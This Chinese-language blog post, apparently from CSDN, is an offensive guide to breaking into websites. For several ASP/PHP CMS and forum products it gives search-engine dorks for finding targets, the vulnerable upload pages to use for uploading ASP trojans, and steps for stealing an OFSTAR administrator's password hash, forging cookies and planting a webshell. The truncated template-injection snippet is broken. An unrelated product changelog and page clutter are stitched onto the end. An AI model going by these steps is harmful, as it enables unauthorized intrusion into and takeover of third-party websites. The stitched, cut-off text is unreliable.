入侵网站的各种漏洞的利用和搜索参数

一、E时代驿站漏洞 
  百度搜索"E时代驿站" 
  漏洞利用页面 /upload.asp 用老兵直接上传 

  二、沸腾新闻系统上传漏洞 
  搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用 
  漏洞:没有对空格进行严格的限制。 
  所以,我们直接选定要上传的asp木马,然后在后面加上空格 
  它的上传文件是UploadFaceOK.asp 

  三、尘缘雅境 

  在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看 
  到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是http://www.xx.com/asfq/index.asp,那么就要这样填写http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改 

  四、OFSTAR论坛漏洞利用程序(群共享中) 
  搜索: powered by ofstar.net 
  1:输入管理员用户名
  2:输入任意一个帖子的路径! 
  3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的! 
  4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台! 

  上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样) 

  然后使用提交页面提交``可以直接拿到shell! 

<style type=’text/css’> 
</style> 
<!-- 
EOT; 
?>--> 
<?copy( 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
+--------------------Build1 1:全新沸腾版面和后台风格。 2:为整合各种论坛提供良好接口。 3:专题页功能加强。 4:大类文章分页显示。 5:加入新闻日历搜索引擎。 6:会员排行可按用户名,注册时间,发文数升降序排列。 7:全新留言板头像,留言可选定是否写给管理员看,并且加入留言审核功能。 8:新闻页快速评论功能,加入新闻阅读签收功能,新闻图片鼠标滚轮缩放功能,新闻标题后评论显示。 9:全新的单位部门设定。 10:增加图片新闻页面。 11:目录结构,文件命名,书写规则规范化。 12:统一了字符过滤代码。 13:栏目菜单分类功能加强。 14:整加页面过度效果设置。 15:附带全新忠网广告管理系统。 16:全新安全补丁。 17:前台用户和后台管理员实现分离,管理员需要再次登陆才能进入管理。 18:后台增加数据库备份压缩,数据恢复,系统空间占用功能,加入阿江ASP探针,附件管理,留言和评论实现独立管理,用户管理增加查找功能。增加其它一些实用小工具。 19:后台网站属性设置增加自定义Bottom菜单,是否开启注册用户签收功能。 20:初始化时可选择部份初始化,统计数据可以初始化。 +--------------------Build2 21:全新的个人用户博客功能 22:全面支持RSS聚合新闻XML功能 23:全面修改总栏、大类、小类叶面,总栏、大类可分别设置不同模版 24:首页增加4种样式供选择 25:附件上传按后缀,时间分别建立目录 +--------------------Build3 26:全面支持无大类、无小类文章,各级页面均支持模板 27:最新添加单位稿件统计(旧版本升级请后台运行Tools_UpdateDB-11-6.asp升级数据库) 28:其他错误修正 +--------------------Build4 29:首页田字格小图片数量选择 30:后台1~3级菜单选择 31:系统设置不启用分级时打开新闻页空白补丁 32:新闻全部显示最新补丁 33:后台管理修正小BUG 34:忠网弹出广告修正 35:后台2处管理权限修正 36:上传漏洞补丁包, 远程非法提交,权限提升,SQL注入漏洞,完全补丁,以及其他小功能增强 37:远程非法提交,权限提升,SQL注入漏洞修正补修正,以及新闻上下篇功能及top透明广告条支持 38:添加无大小类文章BUG修正,其他小问题。top.asp自动换行(可选) 39:留言簿恶意广告攻击漏洞修正(IP过滤,留言验证码),后台文章检索,有情连接申请漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值